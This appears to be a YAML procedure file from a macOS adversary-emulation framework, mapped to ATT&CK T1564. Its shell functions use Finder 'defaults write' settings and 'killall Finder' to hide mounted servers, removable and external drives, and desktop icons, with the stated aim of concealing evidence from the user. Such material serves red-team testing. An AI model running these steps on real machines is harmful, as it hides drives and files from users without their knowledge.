procedure_name: hide_artifacts
ttp_id: T1564
tactic: Defense Evasion
guid: 784d94ea-0329-4e1a-aecd-c0a9e43b60d5
intent: Hide artifacts and evidence from user view by concealing mounted drives, removable
  media, and desktop icons using Finder defaults
author: '@darmado | https://x.com/darmad0'
version: 1.0.3
created: '2025-01-27'
updated: '2025-06-03'
procedure:
  arguments:
  - option: --hide-servers
    description: Hide mounted servers from desktop
    execute_function:
    - hide_mounted_servers
  - option: --hide-removable
    description: Hide removable media from desktop
    execute_function:
    - hide_removable_media
  - option: --hide-external
    description: Hide external hard drives from desktop
    execute_function:
    - hide_external_drives
  - option: --hide-desktop
    description: Hide all desktop icons
    execute_function:
    - hide_desktop_icons
  - option: --all
    description: Hide all artifacts and evidence
    execute_function:
    - hide_mounted_servers
    - hide_removable_media
    - hide_external_drives
    - hide_desktop_icons
  global_variable:
  - name: CMD_DEFAULTS
    type: string
    default_value: defaults
  - name: CMD_KILLALL
    type: string
    default_value: killall
  functions:
  - name: hide_mounted_servers
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      hide_mounted_servers() {
          $CMD_PRINTF "HIDE_TYPE|COMMAND|RESULT\n"
          
          # Hide mounted servers from desktop
          local result
          result=$($CMD_DEFAULTS write com.apple.finder ShowMountedServersOnDesktop -bool false 2>&1)
          $CMD_PRINTF "MOUNTED_SERVERS|defaults write com.apple.finder ShowMountedServersOnDesktop -bool false|%s\n" "$result"
          
          # Restart Finder to apply changes
          local killall_result
          killall_result=$($CMD_KILLALL Finder 2>&1)
          $CMD_PRINTF "FINDER_RESTART|killall Finder|%s\n" "$killall_result"
          
          return 0
      }
  - name: hide_removable_media
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      hide_removable_media() {
          $CMD_PRINTF "HIDE_TYPE|COMMAND|RESULT\n"
          
          # Hide removable media from desktop
          local result
          result=$($CMD_DEFAULTS write com.apple.finder ShowRemovableMediaOnDesktop -bool false 2>&1)
          $CMD_PRINTF "REMOVABLE_MEDIA|defaults write com.apple.finder ShowRemovableMediaOnDesktop -bool false|%s\n" "$result"
          
          # Restart Finder to apply changes
          local killall_result
          killall_result=$($CMD_KILLALL Finder 2>&1)
          $CMD_PRINTF "FINDER_RESTART|killall Finder|%s\n" "$killall_result"
          
          return 0
      }
  - name: hide_external_drives
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      hide_external_drives() {
          $CMD_PRINTF "HIDE_TYPE|COMMAND|RESULT\n"
          
          # Hide external hard drives from desktop
          local result
          result=$($CMD_DEFAULTS write com.apple.finder ShowExternalHardDrivesOnDesktop -bool false 2>&1)
          $CMD_PRINTF "EXTERNAL_DRIVES|defaults write com.apple.finder ShowExternalHardDrivesOnDesktop -bool false|%s\n" "$result"
          
          # Restart Finder to apply changes
          local killall_result
          killall_result=$($CMD_KILLALL Finder 2>&1)
          $CMD_PRINTF "FINDER_RESTART|killall Finder|%s\n" "$killall_result"
          
          return 0
      }
  - name: hide_desktop_icons
    type: main
    language:
    - shell
    opsec:
      check_fda:
        enabled: false
    code: |
      hide_desktop_icons() {
          $CMD_PRINTF "HIDE_TYPE|COMMAND|RESULT\n"
          
          # Hide all desktop icons
          local result
          result=$($CMD_DEFAULTS write com.apple.finder CreateDesktop -bool false 2>&1)
          $CMD_PRINTF "DESKTOP_ICONS|defaults write com.apple.finder CreateDesktop -bool false|%s\n" "$result"
          
          # Restart Finder to apply changes
          local killall_result
          killall_result=$($CMD_KILLALL Finder 2>&1)
          $CMD_PRINTF "FINDER_RESTART|killall Finder|%s\n" "$killall_result"
          
          return 0
      }
